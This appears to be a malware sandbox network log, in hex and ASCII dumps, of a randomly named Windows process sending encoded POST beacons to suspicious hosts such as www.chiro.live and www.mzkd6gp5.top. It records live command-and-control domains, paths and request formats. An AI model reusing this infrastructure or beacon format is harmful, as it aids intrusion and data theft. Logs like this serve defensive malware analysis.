                                                                                    Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                    Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                    Jan 9, 2025 16:53:52.051500082 CET1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                    Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                    Jan 9, 2025 16:53:52.051546097 CET1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                    Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                    Jan 9, 2025 16:53:52.051717043 CET1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                    Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                    Jan 9, 2025 16:53:52.051755905 CET661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                    Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                    Jan 9, 2025 16:53:52.051786900 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.11.304982345.33.2.79805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:54:07.569076061 CET793OUTPOST /jwa9/ HTTP/1.1
                                                                                    Host: www.chiro.live
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.chiro.live
                                                                                    Referer: http://www.chiro.live/jwa9/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 62 31 62 57 4b 43 2f 49 59 6a 66 30 74 63 71 2f 61 71 46 51 5a 65 72 4a 55 45 2b 4d 72 70 30 61 7a 51 6d 75 45 61 6f 4c 2b 76 66 52 72 7a 69 56 36 5a 79 71 4b 70 58 61 2f 35 59 43 4f 6a 57 69 45 49 41 58 48 65 74 2b 58 4b 39 6d 49 63 6d 79 42 62 54 50 4f 52 34 78 58 52 2f 4f 66 30 38 4e 39 65 72 65 45 43 46 4a 79 61 6f 4d 51 48 78 52 6d 42 31 34 35 49 4d 6f 6e 4e 74 73 2b 6a 56 54 79 69 4f 61 43 63 45 4b 68 49 36 77 7a 64 34 78 57 49 34 33 32 56 4b 6e 4d 4d 30 6c 58 56 53 4a 6f 49 77 5a 33 4b 4c 4f 54 37 34 72 6e 7a 7a 6b 43 57 72 52 43 67 3d 3d
                                                                                    Data Ascii: 6B-l7F=qZs751u9hJjEb1bWKC/IYjf0tcq/aqFQZerJUE+Mrp0azQmuEaoL+vfRrziV6ZyqKpXa/5YCOjWiEIAXHet+XK9mIcmyBbTPOR4xXR/Of08N9ereECFJyaoMQHxRmB145IMonNts+jVTyiOaCcEKhI6wzd4xWI432VKnMM0lXVSJoIwZ3KLOT74rnzzkCWrRCg==
                                                                                    Jan 9, 2025 16:54:07.714026928 CET806INHTTP/1.1 200 OK
                                                                                    server: openresty/1.13.6.1
                                                                                    date: Thu, 09 Jan 2025 15:54:07 GMT
                                                                                    content-type: text/html
                                                                                    transfer-encoding: chunked
                                                                                    content-encoding: gzip
                                                                                    connection: close
                                                                                    Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 06 83 9d 60 37 90 4e 42 e3 af 3a 76 e2 38 c1 f8 92 11 92 62 89 08 89 82 00 3b 9d fe f7 62 e8 c4 74 dc 43 75 40 da 65 f7 ed be b7 92 fd e1 db dc 5d fa 77 37 0a 91 11 bb 3c b1 f7 9b c2 00 df 38 2a e6 ea e5 89 52 2e 9b 60 80 ea 63 65 46 58 02 05 12 90 a4 58 3a ea e3 72 d0 ea fd 89 3c fc 26 52 c6 2d fc 23 a3 b9 a3 6e 5b 19 68 41 11 c5 40 d2 80 61 55 81 82 4b cc cb dc f1 8d 83 d1 06 1f 65 73 10 61 47 cd 29 2e 62 91 c8 46 42 41 91 24 0e c2 39 85 b8 55 19 9f 15 ca a9 a4 80 b5 52 08 18 76 0c ad dd 84 93 54 32 7c 69 eb f5 5e d1 a9 9a e4 22 85 09 8d e5 81 d6 bf 7b 4f f0 4b 82 53 d2 68 a1 7d 91 25 cc d9 f3 fb a2 eb 45 51 58 6d 0d 12 9a 08 8d d1 1c eb aa a2 1f 20 6d fd b8 8c 5d a9 d7 94 e7 b8 c4 d9 ff 95 b0 f5 c3 60 ec 40 a0 9d 22 38 13 00 39 2a 12 cf f5 f1 e3 a7 a6 18 35 65 45 ee e2 52 5d 89 b7 52 0f 41 0e 6a 6f 23 6e af c4 4b c6 a1 a4 82 2b 0d 28 e5 e7 bb 7e fb 90 fd 2a 28 47 a2 d0 a4 88 35 26 60 39 5f c1 35 52 12 52 1c [TRUNCATED]
                                                                                    Data Ascii: 266SMs0WPv`7NB:v8b;btCu@e]w7<8*R.`ceFXX:r<&R-#n[hA@aUKesaG).bFBA$9URvT2|i^"{OKSh}%EQXm m]`@"89*5eER]RAjo#nK+(~*(G5&`9_5RRE=H(,@&v0-?YFcXnZZ,oZB<d:x71`JN/_jn|>vh0H@E1uPgXMiQWxpnC2pS<n+Ru]CEtICljL%Ac'mx~8<SWC[^eoCp8zVvzt~[)K0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.11.304982445.33.2.79805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:54:10.245862961 CET813OUTPOST /jwa9/ HTTP/1.1
                                                                                    Host: www.chiro.live
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.chiro.live
                                                                                    Referer: http://www.chiro.live/jwa9/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 6b 61 79 78 57 75 46 65 38 4c 35 76 66 52 6a 54 69 51 6e 4a 79 74 4b 70 4c 38 2f 34 30 43 4f 6e 32 69 45 4e 73 58 62 39 56 39 46 71 39 67 42 38 6d 30 46 62 54 50 4f 52 34 78 58 52 72 6f 66 30 6b 4e 38 75 62 65 47 6a 46 4b 2b 36 6f 54 48 33 78 52 77 78 31 38 35 49 4d 4b 6e 50 4a 4b 2b 67 74 54 79 6a 2b 61 43 4e 45 4a 36 59 36 79 75 4e 35 65 64 59 68 68 34 46 6d 77 4c 65 55 65 50 32 72 39 6b 2f 64 44 71 4a 2f 4d 41 62 45 47 37 79 65 4d 41 55 71 4b 66 72 59 30 44 71 6c 53 7a 71 2f 32 32 6c 6b 67 7a 42 7a 78 53 6b 49 3d
                                                                                    Data Ascii: 6B-l7F=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfkayxWuFe8L5vfRjTiQnJytKpL8/40COn2iENsXb9V9Fq9gB8m0FbTPOR4xXRrof0kN8ubeGjFK+6oTH3xRwx185IMKnPJK+gtTyj+aCNEJ6Y6yuN5edYhh4FmwLeUeP2r9k/dDqJ/MAbEG7yeMAUqKfrY0DqlSzq/22lkgzBzxSkI=
                                                                                    Jan 9, 2025 16:54:10.390666962 CET806INHTTP/1.1 200 OK
                                                                                    server: openresty/1.13.6.1
                                                                                    date: Thu, 09 Jan 2025 15:54:10 GMT
                                                                                    content-type: text/html
                                                                                    transfer-encoding: chunked
                                                                                    content-encoding: gzip
                                                                                    connection: close
                                                                                    Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 e6 cb 26 b1 1b 48 27 a1 f1 57 1d 3b 71 9c 60 fb 92 11 92 62 89 08 89 82 00 3b 9d fe f7 62 e8 c4 74 dc 43 75 40 da 65 f7 ed be b7 92 f3 e1 db cc 5b ac ee 6e 14 22 23 76 79 e2 ec 37 85 01 be 71 55 cc d5 cb 13 a5 5c 0e c1 00 d5 c7 ca 8c b0 04 0a 24 20 49 b1 74 d5 c7 45 bf d5 fd 13 79 f8 4d a4 8c 5b f8 47 46 73 57 dd b6 32 d0 82 22 8a 81 a4 01 c3 aa 02 05 97 98 97 b9 a3 1b 17 a3 0d 3e ca e6 20 c2 ae 9a 53 5c c4 22 91 8d 84 82 22 49 5c 84 73 0a 71 ab 32 3e 2b 94 53 49 01 6b a5 10 30 ec 9a 9a d1 84 93 54 32 7c e9 e8 f5 5e d1 a9 9a e4 22 85 09 8d e5 81 d6 bf 7b 4f f0 4b 82 53 d2 68 c1 b8 c8 12 e6 ee f9 7d d1 f5 a2 28 ce 0d 0d 12 9a 08 8d d1 1c eb aa a2 1f 20 1d fd b8 8c 53 a9 d7 94 e7 b8 84 fd 7f 25 1c fd 30 18 27 10 68 a7 08 ce 04 40 ae 8a c4 73 7d fc f8 a9 29 46 4d 59 91 bb b8 54 57 e2 ad d4 43 90 83 da db 88 db 2b f1 92 71 28 a9 e0 4a 03 4a f9 f9 ae df 3e 64 bf 0a ca 91 28 34 29 62 8d 09 58 ce 57 70 8d 94 84 14 57 [TRUNCATED]
                                                                                    Data Ascii: 266SMs0WPv&H'W;q`b;btCu@e[n"#vy7qU\$ ItEyM[GFsW2"> S\""I\sq2>+SIk0T2|^"{OKSh}( S%0'h@s})FMYTWC+q(JJ>d(4)bXWpWQ5]4LOQNkfvnTHglR&^^WW:j9p7:yS^{Xn=,$(zGdqi^^PlF|>-S,hSe't.WyXtz{2`r#6W%Ic'm}~8PnWQzIB0g%9MzVLwzt~[)K0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.11.304982545.33.2.79805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:54:12.931546926 CET1289OUTPOST /jwa9/ HTTP/1.1
                                                                                    Host: www.chiro.live
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.chiro.live
                                                                                    Referer: http://www.chiro.live/jwa9/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 73 61 79 44 4f 75 45 35 41 4c 34 76 66 52 70 7a 69 52 6e 4a 7a 6f 4b 70 44 77 2f 34 70 31 4f 6c 4f 69 46 76 6b 58 58 63 56 39 4f 71 39 67 4d 63 6d 78 42 62 54 67 4f 52 6f 4c 58 52 37 6f 66 30 6b 4e 38 74 54 65 42 79 46 4b 38 36 6f 4d 51 48 78 56 6d 42 30 6a 35 49 56 6f 6e 50 64 38 2b 6a 64 54 79 51 47 61 42 2f 73 4a 36 59 36 79 6a 74 35 62 64 59 64 6b 34 46 75 6b 4c 63 30 6f 50 6c 48 39 31 36 34 4d 75 59 7a 6e 66 64 45 6d 7a 54 75 30 49 32 75 75 58 4d 4d 58 4d 5a 70 51 36 4f 71 63 2b 53 41 4f 6b 67 2f 30 41 6a 63 46 49 69 44 6d 61 39 4f 4c 4e 65 76 6b 39 41 56 42 46 74 53 33 35 72 49 4d 4d 77 79 4d 53 31 52 58 77 48 79 46 5a 70 34 62 4b 49 4f 4e 4c 4b 6b 73 61 79 52 66 59 4b 6d 56 35 36 77 58 55 6e 62 51 4a 46 62 5a 68 71 44 34 78 44 4b 61 6b 56 73 52 67 2b 73 78 56 6b 52 47 5a 65 35 73 4e 4b 50 78 65 53 64 7a 4a 61 5a 70 7a 74 4a 6d 54 56 62 54 63 6b 4f [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfsayDOuE5AL4vfRpziRnJzoKpDw/4p1OlOiFvkXXcV9Oq9gMcmxBbTgORoLXR7of0kN8tTeByFK86oMQHxVmB0j5IVonPd8+jdTyQGaB/sJ6Y6yjt5bdYdk4FukLc0oPlH9164MuYznfdEmzTu0I2uuXMMXMZpQ6Oqc+SAOkg/0AjcFIiDma9OLNevk9AVBFtS35rIMMwyMS1RXwHyFZp4bKIONLKksayRfYKmV56wXUnbQJFbZhqD4xDKakVsRg+sxVkRGZe5sNKPxeSdzJaZpztJmTVbTckO0FE+UhQWRCgU4xmxNCIKP2/vxE1WbYGBNZBD/ouBV0i+cfQDJxmq9GxCECvz/DPgpNMSVYSvE31ySSUkqutg4+DJVymMKKNg2iOpDG7U3yfP/G5mlnlsEMdOjCH49CfvfjHHPSAfQKA0AhKS4Fu6YJ24hX81o3lpL+8s5rV6bQ+dRR9N1BUWtNgsuyrdaHlh9bKXHX24C/ON82Hi2T2Ky1EBj2ONO7C30UVj/LFTCfStRZGw5Q1mSLZKKysaED43cgHPrRfN98sPVjF2dAv9Jotem52C6056pBNtUW6TFgjnm+5QmxtVOcR7OSRe2mjM1wW971Im5vG3OL//pl0Jxjuos3Mkg7qznrb9zF8J
                                                                                    Jan 9, 2025 16:54:12.931598902 CET2578OUTData Raw: 41 4c 37 42 63 52 37 6d 46 58 42 59 4f 49 31 53 59 57 73 4b 65 49 75 35 73 7a 70 50 78 49 68 5a 2f 73 48 64 77 2b 44 6d 53 61 2f 5a 54 4a 39 73 46 71 58 50 49 45 4c 78 71 49 32 6e 55 66 61 64 38 4d 74 32 73 77 75 42 78 6d 38 4e 31 32 52 37 37 68
                                                                                    Data Ascii: AL7BcR7mFXBYOI1SYWsKeIu5szpPxIhZ/sHdw+DmSa/ZTJ9sFqXPIELxqI2nUfad8Mt2swuBxm8N12R77hvXRdgN78AVrqqFN08gzz6YM3Qg63TdurPPd3+O4NKtYphxRDSaBcvefuzZsOijEz1Qsd//JqsTFj98fVa53rRUPHL1EEg7q7DTL31UZENO30mKP0gqq26jGHCTdNJqu8KKKsuA9Xmi717ceTxVCJcD0VVzaATABz+
                                                                                    Jan 9, 2025 16:54:12.931653976 CET63OUTData Raw: 6b 57 46 35 44 62 70 5a 6c 37 63 6b 30 65 55 66 34 33 30 37 6c 38 76 4c 50 39 49 6b 58 6c 56 72 6e 53 67 66 46 32 31 55 4e 43 6c 36 79 49 74 4a 66 75 73 2f 2f 76 35 78 68 6c 74 4c 77 3d 3d
                                                                                    Data Ascii: kWF5DbpZl7ck0eUf4307l8vLP9IkXlVrnSgfF21UNCl6yItJfus//v5xhltLw==
                                                                                    Jan 9, 2025 16:54:13.076890945 CET806INHTTP/1.1 200 OK
                                                                                    server: openresty/1.13.6.1
                                                                                    date: Thu, 09 Jan 2025 15:54:13 GMT
                                                                                    content-type: text/html
                                                                                    transfer-encoding: chunked
                                                                                    content-encoding: gzip
                                                                                    connection: close
                                                                                    Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 db 72 9b 30 10 7d cf 57 50 1e 32 ed 4c 6d 30 d8 89 dd 40 3a 09 8d 6f 75 ec c4 71 02 f6 4b 46 48 8a 25 22 24 0a 02 ec 74 fa ef e5 d2 89 e9 b8 0f d5 8c 2e bb da 3d bb 7b 56 b2 3e 7c 5b 38 ab f5 dd 8d 42 64 c8 2e 4f ac 72 53 18 e0 5b 5b c5 5c bd 3c 51 8a 61 11 0c 50 7d ac c4 10 4b a0 40 02 e2 04 4b 5b 7d 5c 0d 5b fd 3f 96 87 6b 22 65 d4 c2 3f 52 9a d9 ea ae 95 82 16 14 61 04 24 f5 19 56 15 28 b8 c4 bc f0 9d dc d8 18 6d f1 91 37 07 21 b6 d5 8c e2 3c 12 b1 6c 38 e4 14 49 62 23 9c 51 88 5b 95 f0 59 a1 9c 4a 0a 58 2b 81 80 61 bb d3 d6 9b 70 92 4a 86 2f 2d ad de ab 72 aa 24 b9 48 60 4c 23 79 28 eb df b9 c7 f8 25 c6 09 69 a4 a0 5f a4 31 b3 cb fa be 68 5a 9e e7 e7 7a 1b 12 1a 8b 36 a3 19 d6 54 45 3b 40 5a da 71 18 ab 62 af 49 cf 71 88 de ff 85 b0 b4 43 63 2c 5f a0 bd 22 38 13 00 d9 2a 12 cf f5 f1 e3 a7 26 19 75 c9 8a dc 47 05 bb 12 ef a4 16 80 0c d4 da 86 5d c9 c4 4b ca a1 a4 82 2b 0d 28 e5 e7 3b 7f a5 49 39 72 ca 91 c8 db 52 44 6d 26 60 d1 5f c1 db a4 28 48 [TRUNCATED]
                                                                                    Data Ascii: 266Sr0}WP2Lm0@:ouqKFH%"$t.={V>|[8Bd.OrS[[\<QaP}K@K[}\[?k"e?Ra$V(m7!<l8Ib#Q[YJX+apJ/-r$H`L#y(%i_1hZz6TE;@ZqbIqCc,_"8*&uG]K+(;I9rRDm&`_(H@Q I)Ev<}gu7zO$8~6~+]+:3"sz3)T27e@esi6w3Y<kwlk}/g`#p|wNe>tkn`-#fxIf#&.b3chw]`txD|w7G=>sD=U8\n{HF9GA>t^_5/Z0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.11.304982645.33.2.79805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:54:15.611571074 CET533OUTGET /jwa9/?6B-l7F=nbEb6BapjrCYd3vuEk68dRLY4ua2Mo84Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKTT9RHcltuCAAAk51J4=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.chiro.live
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:54:15.756664038 CET1289INHTTP/1.1 200 OK
                                                                                    server: openresty/1.13.6.1
                                                                                    date: Thu, 09 Jan 2025 15:54:15 GMT
                                                                                    content-type: text/html
                                                                                    transfer-encoding: chunked
                                                                                    connection: close
                                                                                    Data Raw: 34 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 63 68 69 72 6f 2e 6c [TRUNCATED]
                                                                                    Data Ascii: 49D<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.chiro.live/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.chiro.live/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736438055.0042517179&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiYXJncyI6ICI2Qi1sN0Y9bmJFYjZCYXBqckNZZDN2dUVrNjhkUkxZNHVhMk1vODRaOURMZWxUY3JKNHA4aE9pQnBsSTM5enR6aGFhbDc2cUZZS2U4b29KRjIybUkvSnZSUFI5S1p0RVBzR1BTWnZwSHo0Z0tUVDlSSGNsdHVDQUFBazUxSjQ9Jjgwaz1sUmFwQ1BNWGdEayIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7 [TRUNCATED]
                                                                                    Jan 9, 2025 16:54:15.756706953 CET60INData Raw: 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: ; } </script> </body></html>0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.11.3049827104.21.32.1805384C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 9, 2025 16:54:21.038851976 CET799OUTPOST /3u0p/ HTTP/1.1
                                                                                    Host: www.mzkd6gp5.top
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.mzkd6gp5.top
                                                                                    Referer: http://www.mzkd6gp5.top/3u0p/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
